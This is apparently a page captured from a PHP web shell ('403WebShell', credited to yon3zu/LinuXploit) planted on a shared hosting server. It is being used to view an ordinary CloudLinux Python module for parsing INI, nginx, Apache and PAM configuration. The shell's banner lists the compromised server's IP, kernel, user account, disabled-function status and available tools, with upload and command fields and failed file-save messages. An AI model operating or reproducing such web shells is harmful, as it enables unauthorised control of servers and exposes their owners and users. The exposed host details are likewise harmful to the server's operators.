Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.188.43.85
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/imunify360/venv/lib/python3.11/site-packages/clcommon/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/imunify360/venv/lib/python3.11/site-packages/clcommon/clconfpars.py
# -*- coding: utf-8 -*-

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2018 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT
#

import configparser
import locale
import os
import re
import syslog
from collections import namedtuple


class WebConfigParsingError(Exception):
    def __init__(self, message):
        self.message = message


class WebConfigMissing(Exception):
    def __init__(self, message):
        self.message = message


SECHEAD = 'asection'


def load(path, case_sensitive=False, ignore_bad_encoding=False):
    config = configparser.ConfigParser(allow_no_value=True,
                                       interpolation=None,
                                       strict=False)
    if case_sensitive:
        config.optionxform = str
    if ignore_bad_encoding:
        with open(path, 'rb') as f:
            raw = f.read().decode(locale.getpreferredencoding(), 'replace')
    else:
        with open(path, 'r', encoding='utf-8') as f:
            raw = f.read()
    config.read_string(f'[{SECHEAD}]\n' + raw, source=path)
    return dict(config.items(section=SECHEAD))


_QUOTES = "'", '"'

def _strip_escape_quotes_of_config_value(val: str) -> str:
    """
    Strips single or double quote char only if the quote present from both sides.
    """
    if val.startswith(_QUOTES) and val.endswith(_QUOTES):
        return val[1:-1]
    return val


def load_fast(path, delimiter="=", strip_quotes=False):
    data = {}
    with open(path, "r", encoding="utf-8", errors="surrogateescape") as f:
        for line in f.readlines():
            parts = line.split(delimiter, 1)
            try:
                key, value = parts
            except ValueError:
                # Skip broken lines
                continue

            value = value.strip()
            value = (
                _strip_escape_quotes_of_config_value(value)
                if strip_quotes
                else value
            )
            data[key.strip()] = value
    return data


cache = {}

def load_once(path, ignore_errors=False):
    """
    Read ini file once (cached) and return its content as dict
    """
    try:
        res = cache[path]
    except KeyError:
        try:
            res =  cache[path] = load(path)
        except (IOError, configparser.Error):
            if not ignore_errors:
                raise
            res = cache[path] = {}
    return res


def change_settings(settings_dict, path, tmp_path=None):
    if not tmp_path:
        tmp_path = path + ".tmp"

    used_keys = []

    with (open(path, 'r', encoding='utf-8') as fin,
          open(tmp_path, 'w', encoding='utf-8') as fout):
        for line in fin:
            stripped_line = line.strip()
            if stripped_line and not stripped_line.startswith('#'):
                key, _ = stripped_line.split('=', 1)
                key = key.strip()
                if key in settings_dict:
                    fout.write(f'{key}={settings_dict[key]}\n')
                    used_keys.append(key)
                    continue
            fout.write(line)

    with open(tmp_path, 'a', encoding='utf-8') as fout:
        for key in settings_dict:
            if key not in used_keys:
                fout.write(f'{key}={settings_dict[key]}\n')

    os.rename(tmp_path, path)


_NGINX_TOKENS_RE = re.compile(
    r"""
    (
      # Comments
      (:? \# .* $ )

      # Single-, double-quoted strings and bare strings without whitespaces
      | (:? "[^"\n]*?" )
      | (:? '[^'\n]*?' )
      | (:? [^"';\s\{\}]+ )

      # Structural characters
      | ;
      | \{
      | \}
      | \n
    )
    """,
    re.IGNORECASE | re.MULTILINE | re.VERBOSE,
)


def _ngx_tokenize(data):
    tokens = (
        match.group(0)
        for match in _NGINX_TOKENS_RE.finditer(data)
        if match and match.group(0)
    )
    # Explicitly ignore comments
    return (tok for tok in tokens if not tok.startswith('#'))

def _ngx_take_until(it, val):
    for tok in it:
        if tok in val:
            return

        yield tok

def _ngx_take_until_block_end(it):
    lvl = 1
    for t in it:
        if t == "{":
            lvl += 1
        elif t == "}":
            lvl -= 1
        if lvl < 1:
            return
        yield t

def _ngx_scan_block_info(block_tokens, need_fields):
    """Scan a block for required fields, skips nested blocks"""
    info = {}
    for tok in block_tokens:
        # We need to skip until the end of inner block if it occurs
        if tok == "{":
            for _ in _ngx_take_until_block_end(block_tokens):
                pass
        # Now gather the value, the last occurrence is in priority
        if tok in need_fields:
            value_tokens = _ngx_take_until(block_tokens, ";\n")
            info[tok] = list(value_tokens)

    return info


def nginx_conf_loose_parser(data):
    """
    Parse content of NGINX configuration in a manner tolerant to minor mistakes
    and extract relevant fields from all `server` directives.

    Relevant fields are:
    - `server_name`
    - `root` - returned as `document_root`
    - `ssl` - if `listen` field contains "ssl" word

    Doesn't handle interpolated values (ex. `${val}`) outside of quoted strings
    """
    tokens = _ngx_tokenize(data)
    for tok in tokens:
        if tok != "server":
            continue

        # Nothing seems to be allowed between "server" directive and
        #  the opening of his block, so we just discard everything
        #  until first block opening seen
        for _ in _ngx_take_until(tokens, "{"):
            pass

        # Limit further scan by the inside of block
        block_tokens = _ngx_take_until_block_end(tokens)

        # By using only `block_tokens` we ensure all blocks are properly delimited
        info = _ngx_scan_block_info(block_tokens, ("server_name", "root", "listen"))
        try:
            server_name = info["server_name"]
            root = info["root"]
        except KeyError:
            continue
        if not server_name and not root:
            continue

        yield {
            "server_name": _strip_escape_quotes_of_config_value(server_name[0]),
            "document_root": _strip_escape_quotes_of_config_value(root[0]),
            "ssl": "ssl" in info.get("listen", []),
        }


def nginx_conf_parser(conf_file):
    """Parse NGINX config file, see `nginx_conf_loose_parser` for more details"""
    if not os.path.isfile(conf_file):
        raise WebConfigMissing(f'File does not exists {conf_file}')

    dirty_data = read_unicode_file_with_decode_fallback(conf_file)

    return list(nginx_conf_loose_parser(dirty_data))


def apache_conf_parser(conf_file):
    if not os.path.isfile(conf_file):
        raise WebConfigMissing(f'File does not exists {conf_file}')

    conf_data = []

    data_all = read_unicode_file_with_decode_fallback(conf_file).splitlines()

    data = [i for i in data_all if re.search('^((?!#).)*$', i)]

    ID = 0
    enable = False

    result = {}
    vhost = []
    while len(data) > 0:
        out = data.pop(0)
        if "<VirtualHost" in out:
            ip_port = out.split()[1]
            port = '0'
            try:
                ip, port = ip_port.split(':')
                port = port.replace('>', '')
            except ValueError:
                ip = ip_port
            vhost.append(ip)
            vhost.append(port)
            enable = True
            continue

        if "</VirtualHost>" in out:
            result[ID] = vhost
            ID+=1
            enable = False
            vhost = []
            continue

        if enable:
            vhost.append(out)
            continue

    for value in result.values():
        # result[i][0] is an IP
        # result[i][1] is a port
        data = {
                'user' : None,
                'server_name' : '',
                'document_root' : '',
                'server_alias' : None,
                'port' : int(value[1]),
                'ssl' : False,
               }
        for line in value:
            if "ServerName" in line:
                data['server_name'] = line.split()[1].strip().replace('www.', '')
                continue
            if "DocumentRoot" in line:
                # remove all whitespaces (first strip) and also quotes (second one)
                data['document_root'] = line.split()[1].strip().strip('"')
                continue
            if "ServerAlias" in line:
                data['server_alias'] = ','.join(str(n) for n in line.split()[1:])
                continue
            if "SuexecUserGroup" in line:
                data['user'] = line.split()[1].strip()
            if "SSLEngine" in line:
                data['ssl'] = line.split()[1].strip().lower() == 'on'

        conf_data.append(data)

    return conf_data


PamLVECfg = namedtuple('PamLVECfg', ['min_uid', 'cagefs_enabled', 'groups'])

def parse_pam_lve_config(configfile):
    """
    Parse string like:
    "session      required      pam_lve.so      500      1     group1,group2"
    :param configfile: path to config file to parse
    :type configfile: str
    :return: PamLVECfg instance when pam_lve configuratiom is found, None otherwise
    :rtype: namedtuple
    :raises: IOError, ValueError
    """
    with open(configfile, 'r', encoding='utf-8') as f:
        for line in f:
            if line.startswith('#'):
                continue
            s = line.split()
            if len(s) >= 3 and s[2] == 'pam_lve.so':
                # parse config string taking pam_lve defaults into account
                min_uid = int(s[3]) if len(s) >= 4 else 500
                cagefs_enabled = bool(int(s[4])) if len(s) >= 5 else False
                groups = s[5].split(',') if len(s) >= 6 else ['wheel']
                return PamLVECfg(min_uid, cagefs_enabled, groups)
    # pam_lve line is not found in config file
    return None


def read_unicode_file_with_decode_fallback(file_path: str) -> str:
    with open(file_path, 'rb') as f:
        raw_data = f.read()
    try:
        return raw_data.decode()
    except UnicodeDecodeError:
        syslog.syslog(
            syslog.LOG_WARNING,
            f'Failed to decode "{file_path}" content as utf-8 - loading with placeholders for invalid unicode sequences'
        )
        return raw_data.decode(errors='replace')

Youez - 2016 - github.com/yon3zu
LinuXploit